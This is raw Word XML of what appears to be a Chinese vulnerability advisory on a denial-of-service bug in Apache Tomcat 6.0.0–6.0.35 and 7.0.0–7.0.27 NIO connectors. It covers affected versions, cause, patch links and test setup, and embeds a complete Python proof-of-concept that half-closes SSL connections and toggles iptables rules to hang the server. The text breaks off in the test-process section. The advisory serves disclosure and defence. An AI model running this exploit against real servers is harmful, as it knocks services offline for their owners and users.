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B7" w:rsidRDefault="006D5DB7" w:rsidP="008A279F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受影响系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Group Tomcat 7.0.0 - 7.0.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRPr="004123A9" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Group Tomcat 6.0.0 - 6.0.35</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不受影响系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRPr="00CE0A77" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0"/>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞简述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个流行的开放源码的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用服务器程序。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRPr="00294BB4" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:leftChars="200" w:left="420" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat 7.0.0-7.0.27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat 6.0.0-6.0.35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sendfile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NIO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接器时，若客户端请求较大的静态文件，并在读取响应的过程中切断与服务器的连接，会在服务器端产生死循环，导致拒绝服务。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用方法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2"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F23FF0" w:rsidTr="00542A27">
        <w:trPr>
          <w:trHeight w:val="1258"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8402" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t># The way to reproduce the bug in the Tomcat NIO connector.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t># Install python-iptables from https://github.com/ldx/python-iptables/downloads</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t># Author: Dmitry Kukushkin (dmitry.kukushkin at external.telekom.de)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>from threading import Thread</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>from threading import Lock</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>from socket import *</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>from select import *</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>from time import *</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>from traceback import *</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>import ssl</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>import sys</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>import iptc</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>blockedPorts = dict()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>getCssRequest = """GET /filehaha HTTP/1.1\r</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Host: 10.8.146.92:443\r</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_0_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9A406\r</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>Accept: text/css,*/*;q=0.1\r</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>Accept-Language: de-de\r</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>Accept-Encoding: gzip, deflate\r</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>Connection: keep-alive\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>"""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>class Client(Thread):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def __init__(self, tid, lock):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Thread.__init__(self)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self.lock = lock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self.tid = tid</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pP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def run(self):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print "Starting thread %d" % self.tid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try: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clientSocket = socket(AF_INET, SOCK_STREAM)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sslSocket = ssl.wrap_socket(clientSocket)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remoteAddr = ("10.8.146.92", 443)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sslSocket.connect(remoteAddr)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localAddr, localPort =  sslSocket.getsockname()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print "New socket created tid=%d, sfd=%d, sport=%d" % ( self.tid, clientSocket.fileno(), localPort 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self.deleteFirewallRule(localPort, self.lock)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sslSocket.send(getCssRequest)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data = sslSocket.recv(1024)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''' Put the socket into half - closed state '''</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">            clientSocket.shutdown(SHUT_WR)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clientSocket.close()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self.createFirewallRule(localPort, self.lock)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except Exception, e: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print "Error: ", e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print_exc()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pP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@staticmethod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def createFirewallRule(port, lock):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lock.acquire()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print "Creating the iptables rule for port %d" % port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rule = iptc.Rule()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rule.protocol = "tcp"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rule.target = iptc.Target(rule, "REJECT")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pP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match = iptc.Match(rule, "tcp")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match.sport = "%s" % port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rule.add_match(match)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chain = iptc.Chain(iptc.TABLE_FILTER, "OUTPUT")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chain.insert_rule(rule)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rule.target.reset()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blockedPorts[port] = rule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lock.release()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@staticmethod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def deleteFirewallRule(port, lock):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lock.acquire()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if port in blockedPorts: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print "Deleteng the iptables rule for port %d" % port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rule = blockedPorts[port]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chain = iptc.Chain(iptc.TABLE_FILTER, "OUTPUT")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">            chain.delete_rule(rule)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chain.flush()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    del blockedPorts[port]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lock.release()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</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t>if __name__ == "__main__":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if len(sys.argv) == 1 :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print "Problem.py &lt;number of threads&gt;"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exit(0)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clients = []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lock = Lock()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for i in range( int(sys.argv[1]) ):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c = Client(i, lock)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clients.append(c)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c.start()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    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print "Joining"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLine="210"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    for i in clients:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00542A27">
            <w:pPr>
              <w:pStyle w:val="a9"/>
              <w:ind w:firstLineChars="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        i.join()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRPr="009365BF" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用条件及利用方式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRPr="007634CC" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器或主机安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>版本为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6.0.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="001753B2">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6.0.35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00263F79">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7.0.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00263F79">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>7.0.27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要登陆认证。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRPr="009365BF" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:firstLineChars="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>版本为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6.0.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="001753B2">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6.0.35</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>以及</w:t>
      </w:r>
      <w:r w:rsidRPr="00263F79">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7.0.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00263F79">
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>7.0.27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>前提下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此漏洞利用方法简单，只要满足请求静态的较大文件，并在文件下载连接过程中终止连接即可导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修补情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>厂商补丁：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Group</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:t>http://jakarta.apache.org/tomcat/index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRPr="009365BF" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考资料</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A727B6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00A22FE7">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>https://issues.apache.org/bugzilla/show_bug.cgi?id=52858</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00A22FE7">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
          <w:t>http://packetstormsecurity.org/files/118615/Apache-Tomcat-6.x-7.x-Denial-Of-Service.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRPr="000C1EB2" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:leftChars="0" w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析漏洞的实验环境：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLineChars="100" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">:  ubuntu 11.04 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="420" w:firstLineChars="100" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: 7.0.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F23FF0" w:rsidRDefault="00F23FF0" w:rsidP="00F23FF0">
      <w:pPr>
        <w:ind w:firstLineChars="250" w:firstLine="525"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在客户端上执行</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00A22FE7">
          <w:rPr>
            <w:rStyle w:val="a7"/>
          </w:rPr>
